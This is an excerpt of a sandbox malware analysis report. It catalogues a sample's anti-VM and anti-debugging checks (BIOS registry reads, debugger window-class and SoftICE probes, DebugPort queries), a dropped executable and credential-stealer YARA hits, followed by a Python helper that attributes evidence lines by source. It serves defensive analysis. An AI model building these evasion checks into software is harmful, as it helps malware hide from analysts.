Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
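Not every line in this section is evidence of sample behaviour. Lines whose source is Amcache.hve.13.dr come from the analysis machine's own application-compatibility hive, which the sandbox collects alongside dropped files; the VMware device, driver and BIOS names in it describe the sandbox host and say nothing about what the sample looks for. The sample's own hypervisor probes are the registry reads observed from the process (SystemBiosVersion and VideoBiosVersion under HARDWARE\DESCRIPTION\System, and DriverDesc under the display adapter class) and, more weakly, strings found in its memory dumps: HARDWARE\ACPI\DSDT\VBOX__ is a VirtualBox fingerprint, whereas a Winsock provider name such as "Hyper-V RAW" can enter process memory through ordinary socket initialisation on any recent Windows host. The Python helper below is an added example for this page, not part of the report or of Joe Sandbox; it attributes evidence lines by source type and separates sample-attributable VM indicators from host-only strings. The provenance categories, the registry probe list and the VM marker list are the example's own choices; the input lines are taken from this section.

```python
"""Attribute Joe Sandbox evidence lines to what produced them.

Added example for this report page; not Joe Sandbox code and not part of the
sample.  Categories, probe list and marker list are this example's own.
"""
import re
from collections import defaultdict

# Evidence lines taken from this section of the report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe Jump to dropped file",
    r"Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__",
    r"Source: file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW",
    r"Source: Amcache.hve.13.dr Binary or memory string: VMware",
    r"Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device",
    r"Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys",
]

EVIDENCE_KINDS = (
    "Registry key queried",
    "Binary or memory string",
    "Dropped PE file which has not been started",
    "System information queried",
    "Process information queried",
)
# "Jump to behavior" / "Jump to dropped file" is link text from the HTML report
# and is tolerated as an optional suffix.
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) (?P<kind>" + "|".join(map(re.escape, EVIDENCE_KINDS)) + r"): "
    r"(?P<value>.*?)(?: Jump to (?:behavior|dropped file))?$"
)
# Registry values commonly read to fingerprint a hypervisor (this example's list).
REG_VM_PROBES = {"SystemBiosVersion", "VideoBiosVersion", "DriverDesc"}
VM_MARKERS = ("vmware", "vbox", "virtualbox", "hyper-v", "vmci", "qemu", "xen")


def classify_source(src):
    """Map the 'Source:' field to what produced the evidence."""
    if src.endswith(".sdmp"):
        return "sample-memory"      # memory dump of an analysed process
    if src.endswith(".dr"):
        # A file the sandbox collected.  Amcache.hve is the analysis machine's
        # own application-compatibility hive, so its device and driver
        # inventory describes the sandbox host, not anything the sample did.
        return "host-hive" if src.lower().startswith("amcache.hve") else "dropped-file"
    if "\\" in src:
        return "sample-behaviour"   # API-level observation of the named process
    return "other"


def vm_indicator(kind, value):
    """Return the VM-related token in an evidence value, or None."""
    if kind == "Registry key queried":
        name = value.rsplit("name: ", 1)[-1]
        return name if name in REG_VM_PROBES else None
    return value if any(t in value.lower() for t in VM_MARKERS) else None


def triage(lines):
    """Count evidence per provenance class and split VM indicators by who produced them."""
    by_class = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            by_class[classify_source(m["src"])].append((m["kind"], m["value"]))
    sample = [vm_indicator(k, v)
              for cls in ("sample-behaviour", "sample-memory")
              for k, v in by_class.get(cls, [])]
    host = [vm_indicator(k, v) for k, v in by_class.get("host-hive", [])]
    return {
        "counts": {cls: len(items) for cls, items in by_class.items()},
        "sample_vm_indicators": [x for x in sample if x],
        "host_only_vm_strings": [x for x in host if x],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

On the eight sample lines the helper attributes three lines to the sample process, two to its memory dumps and three to the host hive; the sample-attributable VM indicators are the two BIOS version reads, the VBOX__ ACPI path and the Hyper-V RAW string, while the three VMware strings stay on the host-only side. The same split applies to the Windows Defender paths further down, which also come from Amcache.hve.13.dr.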

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FCBDA Start: 006FCC0E End: 006FCC12 0_2_006FCBDA
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004739CC rdtsc 0_2_004739CC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 0_2_00402A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04947D41 push dword ptr fs:[00000030h] 0_2_04947D41
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A20D90 mov eax, dword ptr fs:[00000030h] 0_2_04A20D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2092B mov eax, dword ptr fs:[00000030h] 0_2_04A2092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EE0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00409A2A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040CDE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0040A58A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A720 SetUnhandledExceptionFilter, 0_2_0040A720
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_100056A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10002FDA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A29C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_04A29C91
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04A2A7F1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_04A2D04A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04A2A987 SetUnhandledExceptionFilter, 0_2_04A2A987
Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: pQProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_00410822
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 0.2.file.exe.4a20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.4a50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1259267690.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY